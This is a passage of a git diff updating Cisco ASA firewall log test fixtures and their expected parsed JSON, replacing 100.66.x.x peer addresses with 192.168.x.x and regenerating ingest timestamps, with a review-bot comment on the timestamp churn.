outbound TCP connection 11831 for outside:192.168.98.165/80 
(192.168.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:192.168.179.9/53 (192.168.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:192.168.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:192.168.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:192.168.247.99/80 (192.168.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:192.168.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:192.168.98.165/80 to 
inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 duration 0:00:30 +Oct 10 2018 12:34:56 localhost 
CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:192.168.98.44/8308 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to 
outside:192.168.98.44/8300 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:192.168.0.124/53 (192.168.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:192.168.160.2/53 (192.168.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:192.168.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:192.168.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:192.168.98.44/8309
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 duration 0:00:30 
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:192.168.98.44/8307 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:192.168.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:192.168.98.44/8310
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst 
inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 
dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src 
outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json index df86cbf5a52..749298a2f82 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json @@ -10,8 +10,8 @@ }, "destination": { "port": 8256, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1772, @@ -51,7 +51,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { 
@@ -59,8 +59,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164245900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:100.66.98.44/8256", + "ingested": "2021-12-09T13:33:41.994733500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -93,8 +93,8 @@ }, "source": { "port": 80, - "address": "100.66.205.104", - "ip": "100.66.205.104" + "address": "192.168.205.104", + "ip": "192.168.205.104" }, "tags": [ "preserve_original_event" @@ -129,7 +129,7 @@ "localhost" ], "ip": [ - "100.66.205.104", + "192.168.205.104", "172.31.98.44" ] }, @@ -138,8 +138,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164263500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:100.66.205.104/80 (100.66.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772)", + "ingested": "2021-12-09T13:33:41.994738Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:192.168.205.104/80 (192.168.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -155,7 +155,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.205.104", + "mapped_source_ip": "192.168.205.104", "connection_id": "11757", "source_interface": "outside", "mapped_destination_port": 1772 @@ -177,8 +177,8 @@ }, "source": { "port": 80, - "address": "100.66.211.242", - "ip": "100.66.211.242" + "address": "192.168.211.242", + "ip": "192.168.211.242" }, "tags": [ "preserve_original_event" 
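Review bot: `event.ingested` is rewritten next to every `event.original` in this expected file (first in `@@ -59,8 +59,8 @@`, then in `@@ -138,8 +138,8 @@`, `@@ -224,8 +224,8 @@` and every later `event` hunk) even though the commit only swaps IP addresses, so the expectation pins an ingest-time timestamp that churns on every regeneration and buries the real change in the diff. If the pipeline test tooling for this data stream lets a field be marked as dynamic, declaring `event.ingested` that way would keep these lines stable across reruns; the `ingested`/`original` pairs are the only non-address edits in these hunks. The address swap itself is applied consistently to `address`, `ip`, the `ip` arrays, `mapped_source_ip` and the `event.original` strings, moving the outside peers from the 100.64.0.0/10 shared address space into RFC 1918 space; note that any later enrichment in this pipeline that classifies private versus public addresses will treat every peer in this fixture as internal, which is presumably the intent of using reserved test addresses but leaves the public-address path untested here.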
@@ -213,7 +213,7 @@ "localhost" ], "ip": [ - "100.66.211.242", + "192.168.211.242", "172.31.98.44" ] }, @@ -224,8 +224,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164271800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:100.66.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.994741800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:192.168.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -262,8 +262,8 @@ }, "source": { "port": 80, - "address": "100.66.211.242", - "ip": "100.66.211.242" + "address": "192.168.211.242", + "ip": "192.168.211.242" }, "tags": [ "preserve_original_event" @@ -298,7 +298,7 @@ "localhost" ], "ip": [ - "100.66.211.242", + "192.168.211.242", "172.31.98.44" ] }, @@ -309,8 +309,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164280100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:100.66.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.994748300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:192.168.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -347,8 +347,8 @@ }, "source": { "port": 80, - "address": "100.66.185.90", - "ip": "100.66.185.90" + "address": "192.168.185.90", + "ip": "192.168.185.90" }, "tags": [ "preserve_original_event" 
@@ -383,7 +383,7 @@ "localhost" ], "ip": [ - "100.66.185.90", + "192.168.185.90", "172.31.98.44" ] }, @@ -394,8 +394,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164288300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:100.66.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.994753400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:192.168.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -432,8 +432,8 @@ }, "source": { "port": 80, - "address": "100.66.185.90", - "ip": "100.66.185.90" + "address": "192.168.185.90", + "ip": "192.168.185.90" }, "tags": [ "preserve_original_event" @@ -468,7 +468,7 @@ "localhost" ], "ip": [ - "100.66.185.90", + "192.168.185.90", "172.31.98.44" ] }, @@ -479,8 +479,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164296300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:100.66.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.994758800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:192.168.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -517,8 +517,8 @@ }, "source": { "port": 80, - "address": "100.66.160.197", - "ip": "100.66.160.197" + "address": "192.168.160.197", + "ip": "192.168.160.197" }, "tags": [ "preserve_original_event" 
@@ -553,7 +553,7 @@ "localhost" ], "ip": [ - "100.66.160.197", + "192.168.160.197", "172.31.98.44" ] }, @@ -564,8 +564,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164304500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:100.66.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.994765Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:192.168.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:48.000Z", @@ -602,8 +602,8 @@ }, "source": { "port": 80, - "address": "100.66.205.14", - "ip": "100.66.205.14" + "address": "192.168.205.14", + "ip": "192.168.205.14" }, "tags": [ "preserve_original_event" @@ -638,7 +638,7 @@ "localhost" ], "ip": [ - "100.66.205.14", + "192.168.205.14", "172.31.98.44" ] }, @@ -649,8 +649,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164313Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:100.66.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.994771300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:192.168.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:48.000Z", @@ -687,8 +687,8 @@ }, "source": { "port": 80, - "address": "100.66.124.33", - "ip": "100.66.124.33" + "address": "192.168.124.33", + "ip": "192.168.124.33" }, "tags": [ "preserve_original_event" 
@@ -723,7 +723,7 @@ "localhost" ], "ip": [ - "100.66.124.33", + "192.168.124.33", "172.31.98.44" ] }, @@ -734,8 +734,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164320900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:100.66.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.994779800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:192.168.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:48.000Z", @@ -772,8 +772,8 @@ }, "source": { "port": 80, - "address": "100.66.35.9", - "ip": "100.66.35.9" + "address": "192.168.35.9", + "ip": "192.168.35.9" }, "tags": [ "preserve_original_event" @@ -808,7 +808,7 @@ "localhost" ], "ip": [ - "100.66.35.9", + "192.168.35.9", "172.31.98.44" ] }, @@ -819,8 +819,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164329500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:100.66.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.994786200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:192.168.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -857,8 +857,8 @@ }, "source": { "port": 80, - "address": "100.66.211.242", - "ip": "100.66.211.242" + "address": "192.168.211.242", + "ip": "192.168.211.242" }, "tags": [ "preserve_original_event" 
@@ -893,7 +893,7 @@ "localhost" ], "ip": [ - "100.66.211.242", + "192.168.211.242", "172.31.98.44" ] }, @@ -904,8 +904,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164337500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:100.66.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.994792400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:192.168.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -942,8 +942,8 @@ }, "source": { "port": 80, - "address": "100.66.218.21", - "ip": "100.66.218.21" + "address": "192.168.218.21", + "ip": "192.168.218.21" }, "tags": [ "preserve_original_event" @@ -978,7 +978,7 @@ "localhost" ], "ip": [ - "100.66.218.21", + "192.168.218.21", "172.31.98.44" ] }, @@ -989,8 +989,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164346900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:100.66.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.994798900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:192.168.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -1027,8 +1027,8 @@ }, "source": { "port": 80, - 